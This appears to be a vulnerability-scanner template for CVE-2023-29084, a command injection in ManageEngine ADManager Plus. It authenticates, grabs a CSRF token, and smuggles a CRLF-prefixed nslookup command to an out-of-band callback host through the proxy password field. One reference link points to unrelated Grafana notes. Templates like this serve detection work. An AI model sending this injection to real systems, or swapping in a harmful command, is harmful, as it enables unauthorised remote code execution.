id: CVE-2023-29084

info:
  name: ManageEngine ADManager Plus - Command Injection
  author: rootxharsh,iamnoooob,pdresearch
  severity: high
  description: |
    Zoho ManageEngine ADManager Plus through 7180 allows for authenticated users to exploit command injection via Proxy settings.
  reference:
    - https://hnd3884.github.io/posts/CVE-2023-29084-Command-injection-in-ManageEngine-ADManager-plus/
    - https://community.grafana.com/t/release-notes-v6-3-x/19202
  tags: cve,cve2023,manageengine,admanager,rce,oast,authenticated
  metadata:
    max-request: 3

variables:
  cmd: "nslookup.exe {{interactsh-url}} 1.1.1.1"

http:
  - raw:
      - |
        POST /j_security_check HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}
        Referer: {{BaseURL}}
        Content-Type: application/x-www-form-urlencoded

        is_admp_pass_encrypted=false&j_username={{username}}&j_password={{password}}&domainName=ADManager+Plus+Authentication&AUTHRULE_NAME=ADAuthenticator

      - |
        GET /home.do HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /api/json/admin/saveServerSettings HTTP/1.1
        Host: {{Hostname}}
        X-Requested-With: XMLHttpRequest
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        Origin: {{BaseURL}}
        Referer: {{BaseURL}}

        params=[{"tabId":"proxy","ENABLE_PROXY":true,"SERVER_NAME":"1.1.1.1","USER_NAME":"random","PASSWORD":"asd\r\n{{cmd}}","PORT":"80"}]&admpcsrf={{admpcsrf}}

    cookie-reuse: true
    host-redirects: true
    max-redirects: 2

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '{"message":"'
          - 'Proxy Settings'
        condition: and

      - type: word
        part: interactsh_protocol
        words:
          - "dns"

    extractors:
      - type: kval
        name: admpcsrf
        part: header
        kval:
          - admpcsrf
        internal: true